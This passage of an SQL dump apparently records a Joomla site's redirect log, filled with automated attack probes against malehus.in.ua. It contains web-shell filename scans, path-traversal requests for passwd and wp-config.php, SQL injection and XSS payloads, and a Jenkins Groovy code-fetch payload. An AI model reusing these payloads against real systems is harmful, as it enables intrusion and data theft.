00:00:00',301),(37548,'https://malehus.in.ua/assets/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-04 10:07:05','0000-00-00 00:00:00',301),(37549,'https://malehus.in.ua/admin/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-05 18:53:16','0000-00-00 00:00:00',301),(37550,'https://malehus.in.ua/admin/assets/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-07 14:20:18','0000-00-00 00:00:00',301),(37551,'https://malehus.in.ua/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-08 23:04:59','0000-00-00 00:00:00',301),(37552,'https://malehus.in.ua/assets/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-10 09:16:36','0000-00-00 00:00:00',301),(37553,'https://malehus.in.ua/index.php/rizni-porady/8-novini-2/2474-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-8-misyatsiv-2020-roku',NULL,'','',3,0,'2022-06-11 02:34:35','0000-00-00 00:00:00',301),(37554,'https://malehus.in.ua/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-11 18:13:00','0000-00-00 00:00:00',301),(37555,'https://malehus.in.ua/components/com_sexypolling/vote.php',NULL,'joomla-server.local/index.php/component/search/','',1,0,'2022-06-13 19:05:32','0000-00-00 00:00:00',301),(37556,'https://malehus.in.ua/https://malehus.in.ua/images/stories/230621.jpg',NULL,'','',2,0,'2022-06-15 12:11:10','0000-00-00 00:00:00',301),(37557,'https://malehus.in.ua/view-source:',NULL,'','',2,0,'2022-06-17 04:32:34','0000-00-00 00:00:00',301),(37558,'https://malehus.in.ua/misc/ajax.js',NULL,'','',2,0,'2022-06-17 04:32:35','0000-00-00 00:00:00',301),(37559,'https://malehus.in.ua/old/',NULL,'','',3,0,'2022-06-22 19:53:45','0000-00-00 00:00:00',301),(37560,'https://malehus.in.ua/demo/',NULL,'','',1,0,'2022-06-22 19:53:47','0000-00-00 00:00:00',301),(37561,'https://malehus.in.ua/backup/',NULL,'','',3,0,'2022-06-22 19:53:48','0000-00-00 00:00:00',301),(37562,'https://malehus.in.ua/back/',NULL,'','',1,0,'2022-06-22 19:53:50','0000-00-00 00:00:00',301),(37563,'https://malehus.in.ua/shop/',NULL,'','',1,0,'2022-06-22 19:53:51','0000-00-00 00:00:00',301),(37564,'https://malehus.in.ua/bk/',NULL,'','',1,0,'2022-06-22 19:53:52','0000-00-00 00:00:00',301),(37565,'https://malehus.in.ua/test/',NULL,'','',3,0,'2022-06-22 19:53:52','0000-00-00 00:00:00',301),(37566,'https://malehus.in.ua/wp-content/plugins/jquery-html5-file-upload/readme.txt',NULL,'','',1,0,'2022-06-24 15:19:04','0000-00-00 00:00:00',301),(37567,'https://malehus.in.ua/wp-content/plugins/page-flip-image-gallery/upload.php',NULL,'','',1,0,'2022-06-27 23:18:52','0000-00-00 00:00:00',301),(37568,'https://www.malehus.in.ua/sitemap.xml',NULL,'','',2,0,'2022-06-28 00:26:36','0000-00-00 00:00:00',301),(37569,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=load_ajax_function&file=tf2rghf.jpg',NULL,'','',1,0,'2022-06-29 04:22:19','0000-00-00 00:00:00',301),(37570,'https://malehus.in.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'','',1,0,'2022-06-30 13:47:45','0000-00-00 00:00:00',301),(37571,'https://malehus.in.ua/defaul1.php',NULL,'www.google.com','',5,0,'2022-07-01 16:27:36','0000-00-00 00:00:00',301),(37572,'https://malehus.in.ua/inbexw.php',NULL,'www.google.com','',1,0,'2022-07-01 16:28:06','0000-00-00 00:00:00',301),(37573,'https://malehus.in.ua/wp-content/plugins/apikey/nocap.php',NULL,'www.google.com','',1,0,'2022-07-01 16:28:13','0000-00-00 00:00:00',301),(37574,'https://malehus.in.ua/images/mod_config.php',NULL,'www.google.com','',1,0,'2022-07-01 16:28:29','0000-00-00 00:00:00',301),(37575,'https://malehus.in.ua/xl33t.php',NULL,'www.google.com','',1,0,'2022-07-01 16:28:49','0000-00-00 00:00:00',301),(37576,'https://malehus.in.ua/wp-content/xleet.php',NULL,'www.google.com','',3,0,'2022-07-01 16:29:03','0000-00-00 00:00:00',301),(37577,'https://malehus.in.ua/wordpress/wp-content/themes/twentyfive/include.php',NULL,'www.google.com','',1,0,'2022-07-01 16:29:11','0000-00-00 00:00:00',301),(37578,'https://malehus.in.ua/wp-admin/images/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:29:26','0000-00-00 00:00:00',301),(37579,'https://malehus.in.ua/wp-admin/maint/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:29:33','0000-00-00 00:00:00',301),(37580,'https://malehus.in.ua/wp-admin/meta/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:29:40','0000-00-00 00:00:00',301),(37581,'https://malehus.in.ua/wp-admin/network/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:29:48','0000-00-00 00:00:00',301),(37582,'https://malehus.in.ua/wp-admin/user/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:29:55','0000-00-00 00:00:00',301),(37583,'https://malehus.in.ua/wp-admin/includes/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:30:04','0000-00-00 00:00:00',301),(37584,'https://malehus.in.ua/wp-admin/css/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:30:11','0000-00-00 00:00:00',301),(37585,'https://malehus.in.ua/wp-includes/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:30:28','0000-00-00 00:00:00',301),(37586,'https://malehus.in.ua/wp-content/uploads/xleet.php',NULL,'www.google.com','',1,0,'2022-07-01 16:30:37','0000-00-00 00:00:00',301),(37587,'https://malehus.in.ua/wp-vatva.php',NULL,'www.google.com','',1,0,'2022-07-01 16:30:53','0000-00-00 00:00:00',301),(37588,'https://malehus.in.ua/1975.php',NULL,'www.google.com','',1,0,'2022-07-01 16:31:17','0000-00-00 00:00:00',301),(37589,'https://malehus.in.ua/vabba.php',NULL,'www.google.com','',1,0,'2022-07-01 16:31:25','0000-00-00 00:00:00',301),(37590,'https://malehus.in.ua/qws.php',NULL,'www.google.com','',1,0,'2022-07-01 16:31:34','0000-00-00 00:00:00',301),(37591,'https://malehus.in.ua/wp-content/31cx4.php',NULL,'www.google.com','',1,0,'2022-07-01 16:31:42','0000-00-00 00:00:00',301),(37592,'https://malehus.in.ua/wp-includes/images/media/about.php',NULL,'www.google.com','',1,0,'2022-07-01 16:32:56','0000-00-00 00:00:00',301),(37593,'https://malehus.in.ua/wp-content/languages/themes/radio.php',NULL,'www.google.com','',1,0,'2022-07-01 16:33:04','0000-00-00 00:00:00',301),(37594,'https://malehus.in.ua/wp-includes/text/diff/content.php',NULL,'www.google.com','',1,0,'2022-07-01 16:33:10','0000-00-00 00:00:00',301),(37595,'https://malehus.in.ua/wp-includes/rest-api/search/2index.php',NULL,'www.google.com','',1,0,'2022-07-01 16:33:18','0000-00-00 00:00:00',301),(37596,'https://malehus.in.ua/wp-includes/text/diff/radio.php',NULL,'www.google.com','',1,0,'2022-07-01 16:33:25','0000-00-00 00:00:00',301),(37597,'https://malehus.in.ua/wp-includes/images/media/new-index.php',NULL,'www.google.com','',1,0,'2022-07-01 16:33:31','0000-00-00 00:00:00',301),(37598,'https://malehus.in.ua/wp-includes/images/smilies/2index.php',NULL,'www.google.com','',1,0,'2022-07-01 16:33:53','0000-00-00 00:00:00',301),(37599,'https://malehus.in.ua/wp-content/themes/twentytwenty/content.php',NULL,'www.google.com','',1,0,'2022-07-01 16:34:07','0000-00-00 00:00:00',301),(37600,'https://malehus.in.ua/wp-includes/images/wlw/content.php',NULL,'www.google.com','',1,0,'2022-07-01 16:34:14','0000-00-00 00:00:00',301),(37601,'https://malehus.in.ua/wp-content/themes/zakra/image.php',NULL,'www.google.com','',1,0,'2022-07-01 16:34:28','0000-00-00 00:00:00',301),(37602,'https://malehus.in.ua/cgi-etc/quti.php?pass=shell',NULL,'www.google.com','',1,0,'2022-07-01 16:34:35','0000-00-00 00:00:00',301),(37603,'https://malehus.in.ua/varb.php',NULL,'www.google.com','',1,0,'2022-07-01 16:34:42','0000-00-00 00:00:00',301),(37604,'https://malehus.in.ua/images/up.php',NULL,'www.google.com','',1,0,'2022-07-01 16:34:49','0000-00-00 00:00:00',301),(37605,'https://malehus.in.ua/wp-signin.php',NULL,'www.google.com','',8,0,'2022-07-01 16:35:08','0000-00-00 00:00:00',301),(37606,'https://malehus.in.ua/wp-content/plugins/ubh/up.php/.well-known/',NULL,'www.google.com','',1,0,'2022-07-01 16:36:10','0000-00-00 00:00:00',301),(37607,'https://malehus.in.ua/wp-includes/',NULL,'www.google.com','',1,0,'2022-07-01 16:36:23','0000-00-00 00:00:00',301),(37608,'https://malehus.in.ua/wp-includes/css/',NULL,'www.google.com','',1,0,'2022-07-01 16:36:38','0000-00-00 00:00:00',301),(37609,'https://malehus.in.ua/wp-includes/images/',NULL,'www.google.com','',1,0,'2022-07-01 16:36:45','0000-00-00 00:00:00',301),(37610,'https://malehus.in.ua/wp-admin/maint/',NULL,'www.google.com','',1,0,'2022-07-01 16:36:52','0000-00-00 00:00:00',301),(37611,'https://malehus.in.ua/wp-admin/network/',NULL,'www.google.com','',1,0,'2022-07-01 16:37:00','0000-00-00 00:00:00',301),(37612,'https://malehus.in.ua/wp-content/plugins/',NULL,'www.google.com','',1,0,'2022-07-01 16:37:15','0000-00-00 00:00:00',301),(37613,'https://malehus.in.ua/upload/image/',NULL,'www.google.com','',1,0,'2022-07-01 16:37:23','0000-00-00 00:00:00',301),(37614,'https://malehus.in.ua/wp-content/plugins/ubh/',NULL,'www.google.com','',1,0,'2022-07-01 16:37:31','0000-00-00 00:00:00',301),(37615,'https://malehus.in.ua/wp-content/languages/',NULL,'www.google.com','',1,0,'2022-07-01 16:37:38','0000-00-00 00:00:00',301),(37616,'https://malehus.in.ua/cgi-etc/',NULL,'www.google.com','',1,0,'2022-07-01 16:37:54','0000-00-00 00:00:00',301),(37617,'https://malehus.in.ua/wp-content/plugins/apikey/',NULL,'www.google.com','',1,0,'2022-07-01 16:38:02','0000-00-00 00:00:00',301),(37618,'https://malehus.in.ua/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css',NULL,'','',1,0,'2022-07-01 22:40:24','0000-00-00 00:00:00',301),(37619,'https://malehus.in.ua/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'','',1,0,'2022-07-03 08:11:57','0000-00-00 00:00:00',301),(37620,'https://www.malehus.in.ua/holuby/poshtovi/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',2,0,'2022-07-04 14:22:34','0000-00-00 00:00:00',301),(37621,'https://malehus.in.ua/wp-content/plugins/uploadify/readme.txt',NULL,'','',1,0,'2022-07-04 16:29:38','0000-00-00 00:00:00',301),(37622,'https://malehus.in.ua/wp-content/plugins/ccslider/includes/upload.php',NULL,'','',1,0,'2022-07-07 12:38:05','0000-00-00 00:00:00',301),(37623,'https://malehus.in.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library',NULL,'','',1,0,'2022-07-08 23:04:04','0000-00-00 00:00:00',301),(37624,'https://malehus.in.ua/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php',NULL,'','',1,0,'2022-07-10 10:52:08','0000-00-00 00:00:00',301),(37625,'https://malehus.in.ua/a/b/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',NULL,'','',1,0,'2022-07-14 07:44:35','0000-00-00 00:00:00',301),(37626,'https://malehus.in.ua/download.do?file=../../../../config.text',NULL,'','',1,0,'2022-07-14 07:44:36','0000-00-00 00:00:00',301),(37627,'https://malehus.in.ua/_ignition/health-check',NULL,'','',1,0,'2022-07-14 07:44:36','0000-00-00 00:00:00',301),(37628,'https://malehus.in.ua/webapi/v1/system/accountmanage/account',NULL,'','',1,0,'2022-07-14 07:44:36','0000-00-00 00:00:00',301),(37629,'https://malehus.in.ua/gsearch.php.en?prod=\';prompt`document.domain`;//',NULL,'','',1,0,'2022-07-14 07:44:38','0000-00-00 00:00:00',301),(37630,'https://malehus.in.ua/api/graphql',NULL,'','',1,0,'2022-07-14 07:44:38','0000-00-00 00:00:00',301),(37631,'https://malehus.in.ua/pme/database/pme/phinx.yml',NULL,'','',1,0,'2022-07-14 07:44:46','0000-00-00 00:00:00',301),(37632,'https://malehus.in.ua/http_header.php',NULL,'','',1,0,'2022-07-14 07:44:54','0000-00-00 00:00:00',301),(37633,'https://malehus.in.ua/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.workflow.cps.cpsflowdefinition/checkscriptcompile?value=@grabconfig(disablechecksums=true)\n@grabresolver(name=\'test\', root=\'http://aaa\')\n@grab(group=\'package\', module=\'vulntest\', version=\'1\')\nimport payload;',NULL,'','',1,0,'2022-07-14 07:56:54','0000-00-00 00:00:00',301),(37634,'https://malehus.in.ua/include/thumb.php?dir=http\\..\\admin\\login\\login_check.php',NULL,'','',1,0,'2022-07-14 09:46:12','0000-00-00 00:00:00',301),(37635,'https://malehus.in.ua/wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-14 11:56:48','0000-00-00 00:00:00',301),(37636,'https://malehus.in.ua/wp-blog-post.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-14 11:56:48','0000-00-00 00:00:00',301),(37637,'https://malehus.in.ua/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-14 11:56:48','0000-00-00 00:00:00',301),(37638,'https://malehus.in.ua/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-14 11:56:48','0000-00-00 00:00:00',301),(37639,'https://malehus.in.ua/wp-content/uploads/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-14 11:56:48','0000-00-00 00:00:00',301),(37640,'https://malehus.in.ua/wp-content/uploads/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-14 11:56:49','0000-00-00 00:00:00',301),(37641,'https://malehus.in.ua/cloud-config.yml',NULL,'','',1,0,'2022-07-15 01:24:04','0000-00-00 00:00:00',301),(37642,'https://malehus.in.ua/core-cloud-config.yml',NULL,'','',1,0,'2022-07-15 01:24:04','0000-00-00 00:00:00',301),(37643,'https://malehus.in.ua/app/etc/local.xml',NULL,'','',1,0,'2022-07-15 01:24:31','0000-00-00 00:00:00',301),(37644,'https://malehus.in.ua/store/app/etc/local.xml',NULL,'','',1,0,'2022-07-15 01:24:31','0000-00-00 00:00:00',301),(37645,'https://malehus.in.ua/wp-admin/index.php',NULL,'','',1,0,'2022-07-15 01:53:39','0000-00-00 00:00:00',301),(37646,'https://malehus.in.ua/users/sign_in',NULL,'','',1,0,'2022-07-15 01:53:40','0000-00-00 00:00:00',301),(37647,'https://malehus.in.ua/uploads/user',NULL,'','',1,0,'2022-07-15 01:53:40','0000-00-00 00:00:00',301),(37648,'https://malehus.in.ua/wls-wsat/coordinatorporttype',NULL,'','',2,0,'2022-07-15 03:55:26','0000-00-00 00:00:00',301),(37649,'https://malehus.in.ua/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-07-15 05:05:05','0000-00-00 00:00:00',301),(37650,'https://malehus.in.ua/admin/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-07-15 06:57:12','0000-00-00 00:00:00',301),(37651,'https://malehus.in.ua/plus/ajax_street.php?act=key&key=錦\' union select 1,2,3,4,5,6,7,md5(999999999),9#',NULL,'','',1,0,'2022-07-15 16:38:09','0000-00-00 00:00:00',301),(37652,'https://malehus.in.ua/backup/auto.php?password=nzbwpqsdby06dngnoteo2wdgiekm7j4n&path=../backup/auto.php',NULL,'','',1,0,'2022-07-15 16:38:38','0000-00-00 00:00:00',301),(37653,'https://malehus.in.ua/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null',NULL,'','',1,0,'2022-07-15 16:39:38','0000-00-00 00:00:00',301),(37654,'https://malehus.in.ua/interface/main/main_screen.php?auth=login&site=default',NULL,'','',1,0,'2022-07-15 16:42:36','0000-00-00 00:00:00',301),(37655,'https://malehus.in.ua/+cscoe+/session_password.html',NULL,'','',1,0,'2022-07-15 16:51:50','0000-00-00 00:00:00',301),(37656,'https://malehus.in.ua/zbilakntkhdame.php',NULL,'','',1,0,'2022-07-15 18:22:46','0000-00-00 00:00:00',301),(37657,'https://malehus.in.ua/01.php',NULL,'','',10,0,'2022-07-15 18:23:09','0000-00-00 00:00:00',301),(37658,'https://malehus.in.ua/1xleet.php',NULL,'','',2,0,'2022-07-15 18:24:24','0000-00-00 00:00:00',301),(37659,'https://malehus.in.ua/4index.php',NULL,'','',2,0,'2022-07-15 18:25:30','0000-00-00 00:00:00',301),(37660,'https://malehus.in.ua/5index.php',NULL,'','',2,0,'2022-07-15 18:25:45','0000-00-00 00:00:00',301),(37661,'https://malehus.in.ua/6index.php',NULL,'','',2,0,'2022-07-15 18:25:57','0000-00-00 00:00:00',301),(37662,'https://malehus.in.ua/7index.php',NULL,'','',2,0,'2022-07-15 18:26:32','0000-00-00 00:00:00',301),(37663,'https://malehus.in.ua/8index.php',NULL,'','',2,0,'2022-07-15 18:26:43','0000-00-00 00:00:00',301),(37664,'https://malehus.in.ua/9index.php',NULL,'','',2,0,'2022-07-15 18:27:05','0000-00-00 00:00:00',301),(37665,'https://malehus.in.ua/am.php',NULL,'','',2,0,'2022-07-15 18:30:32','0000-00-00 00:00:00',301),(37666,'https://malehus.in.ua/blog/fw.php',NULL,'','',6,0,'2022-07-15 18:31:45','0000-00-00 00:00:00',301),(37667,'https://malehus.in.ua/contacts.php',NULL,'','',2,0,'2022-07-15 18:32:16','0000-00-00 00:00:00',301),(37668,'https://malehus.in.ua/fox.php',NULL,'','',11,0,'2022-07-15 18:34:44','0000-00-00 00:00:00',301),(37669,'https://malehus.in.ua/gel4y.php',NULL,'','',3,0,'2022-07-15 18:35:41','0000-00-00 00:00:00',301),(37670,'https://malehus.in.ua/gif.php',NULL,'','',2,0,'2022-07-15 18:35:50','0000-00-00 00:00:00',301),(37671,'https://malehus.in.ua/goods.php',NULL,'','',10,0,'2022-07-15 18:36:05','0000-00-00 00:00:00',301),(37672,'https://malehus.in.ua/images/about.php',NULL,'','',11,0,'2022-07-15 18:37:20','0000-00-00 00:00:00',301),(37673,'https://malehus.in.ua/images/sym.php',NULL,'','',2,0,'2022-07-15 18:37:25','0000-00-00 00:00:00',301),(37674,'https://malehus.in.ua/lab.php',NULL,'','',2,0,'2022-07-15 18:38:25','0000-00-00 00:00:00',301),(37675,'https://malehus.in.ua/leaf_mailer.php',NULL,'','',2,0,'2022-07-15 18:38:41','0000-00-00 00:00:00',301),(37676,'https://malehus.in.ua/leaf_php.php',NULL,'','',2,0,'2022-07-15 18:38:59','0000-00-00 00:00:00',301),(37677,'https://malehus.in.ua/mailer1.php',NULL,'','',2,0,'2022-07-15 18:40:14','0000-00-00 00:00:00',301),(37678,'https://malehus.in.ua/mari.php',NULL,'','',10,0,'2022-07-15 18:40:56','0000-00-00 00:00:00',301),(37679,'https://malehus.in.ua/ms.php',NULL,'','',2,0,'2022-07-15 18:41:39','0000-00-00 00:00:00',301),(37680,'https://malehus.in.ua/wp-content/plugins/contus-hd-flv-player/uploadvideo.php',NULL,'','',1,0,'2022-07-16 19:09:03','0000-00-00 00:00:00',301),(37681,'https://malehus.in.ua/wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd',NULL,'','',1,0,'2022-07-18 02:49:24','0000-00-00 00:00:00',301),(37682,'https://malehus.in.ua/wp-content/plugins/contus-video-galleryversion-10/upload1.php',NULL,'','',1,0,'2022-07-18 06:59:11','0000-00-00 00:00:00',301),(37683,'https://malehus.in.ua/wp-beckup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',1,0,'2022-07-19 13:54:54','0000-00-00 00:00:00',301),(37684,'https://malehus.in.ua/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css',NULL,'','',1,0,'2022-07-19 18:25:16','0000-00-00 00:00:00',301),(37685,'https://malehus.in.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'','',1,0,'2022-07-21 07:57:38','0000-00-00 00:00:00',301),(37686,'https://malehus.in.ua/wp-content/plugins/mm-forms/includes/doajaxfileupload.php',NULL,'','',1,0,'2022-07-22 17:32:28','0000-00-00 00:00:00',301),(37687,'https://malehus.in.ua/makhdamxehadshell.php',NULL,'','',1,0,'2022-07-23 04:44:09','0000-00-00 00:00:00',301),(37688,'https://malehus.in.ua/server.php',NULL,'','',1,0,'2022-07-23 06:18:49','0000-00-00 00:00:00',301),(37689,'https://malehus.in.ua/sh.php',NULL,'','',9,0,'2022-07-23 06:18:54','0000-00-00 00:00:00',301),(37690,'https://malehus.in.ua/tuco.php',NULL,'','',2,0,'2022-07-23 06:19:53','0000-00-00 00:00:00',301),(37691,'https://malehus.in.ua/w3llstore.php',NULL,'','',10,0,'2022-07-23 06:31:09','0000-00-00 00:00:00',301),(37692,'https://malehus.in.ua/wp-admin/css/colors/coffee/fw.php',NULL,'','',2,0,'2022-07-23 06:31:29','0000-00-00 00:00:00',301),(37693,'https://malehus.in.ua/wp-admin/css/fw.php',NULL,'','',10,0,'2022-07-23 06:31:38','0000-00-00 00:00:00',301),(37694,'https://malehus.in.ua/wp-admin/includes/fw.php',NULL,'','',1,0,'2022-07-23 06:41:32','0000-00-00 00:00:00',301),(37695,'https://malehus.in.ua/wp-admin/maint/about.php',NULL,'','',10,0,'2022-07-23 06:41:38','0000-00-00 00:00:00',301),(37696,'https://malehus.in.ua/wp-admin/maint/fw.php',NULL,'','',1,0,'2022-07-23 06:41:54','0000-00-00 00:00:00',301),(37697,'https://malehus.in.ua/wp-admin/shell.php',NULL,'','',1,0,'2022-07-23 06:42:03','0000-00-00 00:00:00',301),(37698,'https://malehus.in.ua/wp-admin/x.php',NULL,'','',1,0,'2022-07-23 06:42:07','0000-00-00 00:00:00',301),(37699,'https://malehus.in.ua/wp-content/about.php',NULL,'','',10,0,'2022-07-23 06:42:31','0000-00-00 00:00:00',301),(37700,'https://malehus.in.ua/wp-content/plugins/zedd/1.php',NULL,'','',2,0,'2022-07-23 06:42:35','0000-00-00 00:00:00',301),(37701,'https://malehus.in.ua/wp-content/wp.php',NULL,'','',9,0,'2022-07-23 06:42:42','0000-00-00 00:00:00',301),(37702,'https://malehus.in.ua/wp-content/x.php',NULL,'','',9,0,'2022-07-23 06:42:47','0000-00-00 00:00:00',301),(37703,'https://malehus.in.ua/wp-mna.php',NULL,'','',1,0,'2022-07-23 06:53:58','0000-00-00 00:00:00',301),(37704,'https://malehus.in.ua/wpx.php',NULL,'','',1,0,'2022-07-23 06:54:27','0000-00-00 00:00:00',301),(37705,'https://malehus.in.ua/xmrlpc.php',NULL,'','',1,0,'2022-07-23 07:06:14','0000-00-00 00:00:00',301),(37706,'https://malehus.in.ua/xz.php',NULL,'','',1,0,'2022-07-23 07:06:24','0000-00-00 00:00:00',301),(37707,'https://malehus.in.ua/yuuki.php',NULL,'','',1,0,'2022-07-23 07:06:33','0000-00-00 00:00:00',301),(37708,'https://malehus.in.ua/wp-content/plugins/gallery-plugin/upload/php.php',NULL,'','',1,0,'2022-07-25 09:51:28','0000-00-00 00:00:00',301),(37709,'https://malehus.in.ua/?format=feed\'brjpdw<\'\">fiajil&type=rss',NULL,'','',1,0,'2022-08-05 16:54:35','0000-00-00 00:00:00',301),(37710,'https://malehus.in.ua/?format=feed\') and extractvalue(9001,concat(0x5c,0x71706b6b71,(select (elt(9001=9001,1))),0x716a787171)) and (\'ayjt\'=\'ayjt&type=rss',NULL,'','',1,0,'2022-08-05 16:54:35','0000-00-00 00:00:00',301),(37711,'https://malehus.in.ua/?format=feed\' and extractvalue(9001,concat(0x5c,0x71706b6b71,(select (elt(9001=9001,1))),0x716a787171)) and \'lltj\'=\'lltj&type=rss',NULL,'','',1,0,'2022-08-05 16:54:36','0000-00-00 00:00:00',301),(37712,'https://malehus.in.ua/?format=feed) and extractvalue(9001,concat(0x5c,0x71706b6b71,(select (elt(9001=9001,1))),0x716a787171)) and (7815=7815&type=rss',NULL,'','',1,0,'2022-08-05 16:54:36','0000-00-00 00:00:00',301),(37713,'https://malehus.in.ua/?format=feed and extractvalue(9001,concat(0x5c,0x71706b6b71,(select (elt(9001=9001,1))),0x716a787171))&type=rss',NULL,'','',1,0,'2022-08-05 16:54:36','0000-00-00 00:00:00',301),(37714,'https://malehus.in.ua/?format=feed and extractvalue(9001,concat(0x5c,0x71706b6b71,(select (elt(9001=9001,1))),0x716a787171))-- ugzr&type=rss',NULL,'','',1,0,'2022-08-05 16:54:36','0000-00-00 00:00:00',301),(37715,'https://malehus.in.ua/?format=feed\') and 4747=cast((chr(113)||chr(112)||chr(107)||chr(107)||chr(113))||(select (case when (4747=4747) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(120)||chr(113)||chr(113)) as numeric) and (\'qrsj\'=\'qrsj&type=rss',NULL,'','',1,0,'2022-08-05 16:54:37','0000-00-00 00:00:00',301),(37716,'https://malehus.in.ua/?format=feed\' and 4747=cast((chr(113)||chr(112)||chr(107)||chr(107)||chr(113))||(select (case when (4747=4747) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(120)||chr(113)||chr(113)) as numeric) and \'lbdf\'=\'lbdf&type=rss',NULL,'','',1,0,'2022-08-05 16:54:37','0000-00-00 00:00:00',301),(37717,'https://malehus.in.ua/?format=feed) and 4747=cast((chr(113)||chr(112)||chr(107)||chr(107)||chr(113))||(select (case when (4747=4747) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(120)||chr(113)||chr(113)) as numeric) and (4582=4582&type=rss',NULL,'','',1,0,'2022-08-05 16:54:37','0000-00-00 00:00:00',301),(37718,'https://malehus.in.ua/?format=feed and 4747=cast((chr(113)||chr(112)||chr(107)||chr(107)||chr(113))||(select (case when (4747=4747) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(120)||chr(113)||chr(113)) as numeric)&type=rss',NULL,'','',1,0,'2022-08-05 16:54:37','0000-00-00 00:00:00',301),(37719,'https://malehus.in.ua/?format=feed and 4747=cast((chr(113)||chr(112)||chr(107)||chr(107)||chr(113))||(select (case when (4747=4747) then 1 else 0 end))::text||(chr(113)||chr(106)||chr(120)||chr(113)||chr(113)) as numeric)-- grpy&type=rss',NULL,'','',1,0,'2022-08-05 16:54:38','0000-00-00 00:00:00',301),(37720,'https://malehus.in.ua/?format=feed\') and 8470 in (select (char(113)+char(112)+char(107)+char(107)+char(113)+(select (case when (8470=8470) then char(49) else char(48) end))+char(113)+char(106)+char(120)+char(113)+char(113))) and (\'jlda\'=\'jlda&type=rss',NULL,'','',1,0,'2022-08-05 16:54:38','0000-00-00 00:00:00',301),(37721,'https://malehus.in.ua/?format=feed\' and 8470 in (select (char(113)+char(112)+char(107)+char(107)+char(113)+(select (case when (8470=8470) then char(49) else char(48) end))+char(113)+char(106)+char(120)+char(113)+char(113))) and \'aifp\'=\'aifp&type=rss',NULL,'','',1,0,'2022-08-05 16:54:38','0000-00-00 00:00:00',301),(37722,'https://malehus.in.ua/?format=feed) and 8470 in (select (char(113)+char(112)+char(107)+char(107)+char(113)+(select (case when (8470=8470) then char(49) else char(48) end))+char(113)+char(106)+char(120)+char(113)+char(113))) and (3569=3569&type=rss',NULL,'','',1,0,'2022-08-05 16:54:38','0000-00-00 00:00:00',301),(37723,'https://malehus.in.ua/?format=feed and 8470 in (select (char(113)+char(112)+char(107)+char(107)+char(113)+(select (case when (8470=8470) then char(49) else char(48) end))+char(113)+char(106)+char(120)+char(113)+char(113)))&type=rss',NULL,'','',1,0,'2022-08-05 16:54:39','0000-00-00 00:00:00',301),(37724,'https://malehus.in.ua/?format=feed and 8470 in (select (char(113)+char(112)+char(107)+char(107)+char(113)+(select (case when (8470=8470) then char(49) else char(48) end))+char(113)+char(106)+char(120)+char(113)+char(113)))-- leee&type=rss',NULL,'','',1,0,'2022-08-05 16:54:39','0000-00-00 00:00:00',301),(37725,'https://malehus.in.ua/?format=feed\') and 5494=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(112)||chr(107)||chr(107)||chr(113)||(select (case when (5494=5494) then 1 else 0 end) from dual)||chr(113)||chr(106)||chr(120)||chr(113)||chr(113)||chr(62))) from dual) and (\'onxb\'=\'onxb&type=rss',NULL,'','',1,0,'2022-08-05 16:54:39','0000-00-00 00:00:00',301),(37726,'https://malehus.in.ua/?format=feed\' and 5494=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(112)||chr(107)||chr(107)||chr(113)||(select (case when (5494=5494) then 1 else 0 end) from dual)||chr(113)||chr(106)||chr(120)||chr(113)||chr(113)||chr(62))) from dual) and \'mgzd\'=\'mgzd&type=rss',NULL,'','',1,0,'2022-08-05 16:54:39','0000-00-00 00:00:00',301),(37727,'https://malehus.in.ua/?format=feed) and 5494=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(112)||chr(107)||chr(107)||chr(113)||(select (case when (5494=5494) then 1 else 0 end) from 